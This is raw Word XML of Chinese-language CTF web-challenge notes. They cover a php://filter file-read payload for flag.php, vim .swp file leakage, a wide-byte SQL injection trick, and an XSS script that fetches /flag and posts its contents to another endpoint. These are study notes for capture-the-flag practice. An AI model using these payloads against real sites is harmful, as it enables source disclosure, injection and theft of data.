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EA3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Robots协议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C967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225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A1B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50275B9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多重验证和data协议，filter协议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF0E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1682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11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?file=php://filter/convert.base64-encode/resource=flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E36AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D459B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Vim隐藏flag：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C927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Vim编写文件异常退出后会产生.swp文件，可在网址访问/.index.php.swq读取文件，其中index.php为vim编写后异常退出的文件，可以是其他类型文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F75D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472EF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宽字节注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579F4C2">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2318385"/>
            <wp:effectExtent l="0" t="0" r="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E9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汉字url编码是两个字符%CE%D2，字符url编码是一个字符且字符中没有字母，我们可以用汉字编码的一般如%CE+\来将%CE\转义为一个汉字，从而使\后面的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有意义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B3E4D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CA37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XSS注入：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="58415BBE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response;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xhr = new XMLHttpRequest();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xhr.open("GET", "/flag", true);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xhr.onreadystatechange =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if (xhr.readyState == 4 &amp;&amp; xhr.status == 200)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response = xhr.responseText;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console.log(response);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FLAG();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xhr.send();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function FLAG(){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var xhr = new XMLHttpRequest();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xhr.onreadystatechange = function ()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(xhr.readyState == 4)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console.log("后端返回的结果："+this.responseText);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xhr.open( "post",  "/content/9772204351d6d73ed0f55fc0adfc11e1", true);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xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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xhr.send("content="+ response);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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C933B2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mYzllMjQ2MDg1ODBhMDY5MmJmNDIwNTA5ZDk3Y2UifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0F1C3AFD"/>
    <w:rsid w:val="158A7E73"/>
    <w:rsid w:val="228E1AAF"/>
    <w:rsid w:val="43AA70B0"/>
    <w:rsid w:val="51FB76FE"/>
    <w:rsid w:val="54F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270</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>270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2024-09-30T16:02:00Z</dcterms:created>
  <dc:creator>Lenovo</dc:creator>
  <cp:lastModifiedBy>WZ梦天</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-30T11:01:06Z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DDE1DAD52A7346169007184325F48102_12</vt:lpwstr>
  </property>
</Properties>
</file>